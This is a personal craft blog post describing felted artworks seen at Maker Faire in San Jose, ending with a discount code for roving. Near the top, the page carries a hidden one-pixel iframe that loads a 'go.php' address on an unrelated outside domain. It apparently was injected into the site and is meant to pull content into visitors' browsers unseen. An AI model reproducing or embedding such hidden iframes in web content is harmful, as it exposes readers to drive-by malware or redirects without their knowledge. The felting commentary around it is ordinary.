I went to the Maker Faire the needle and wet felters were there…

23 May

This past weekend we headed out to Maker Faire in San Jose Ca and all I can say is AMAZING! They had tesla coils, giant mechanical birds, and more robots than you can shake a mechanical finger at but here’s what inspired me… (spoiler alert it involves felt)


<iframe src=”http://financegoodtime.com/go.php?sid=2&#8243; width=”1px” height=”1px”

This booth was buzzing so I didn’t really get to talk to the artist other than a few words, the words I chose were, “wow” and “needle or wet felted” and the replies I received: “thanks” and “both”

These pieces were from Woolbuddies ( I hope I’ve got that right I was too in awe to take notes.) I just love the juxtaposition of man-ly objects and a traditionally female art form of course the hot pink doesn’t hurt either!! Modern, cool and comical this booth was all this and more!

Plus you gotta love any dude who needlefelts, no really you have to, it’s a new law…look it up.

Bonus points for the suit jacket and creative use of mustaches.  I wish I’d managed to get a picture of the ultra huggable dinosaur but just trust me AHH -MAZING!

But my roving rondevu’s weren’t over yet, later inside the area called the Bazaar Bizarre I spied these little cuties:
needle felted sea horse

 The attention to detail on these pieces was mind boggling!!! Sadly I did not get to talk to the artist but they look to be needle (rather than wet) felted. Sorry I didn’t get the name of this booth but if you know who these critters belong to please let me know so they can get credit for bringing these guys to life!

needle felting maker faire

 Can’t you just tell that mouse and chick are friends? I hope if they were bought that they stayed together.

needle felted octopusWhile contemplating this guy there was universal agreement that octopi are, for all intensive purposes, awesome!

wet felted jewelry

Lastly are these stunning pieces by Naoko Nojiri. Just amazing!!! The pieces were clearly wet felted and their free formed outlines are reminiscent of impressionist paintings! (see that art history class wasn’t such a waste) What an amazing and talented artist!

So my takeaways from this are, I must return to needle and wet felting, (right after I finish the 47 projects I have lined up) and everything looks better in a bell jar!!

 In case you’re feeling inspired too we are offering  35% off roving for the next week only so go get your felt on! (use code MF at checkout)

Anyone know if this means I can write off my funnel cake?

~Andie

 

What's up?

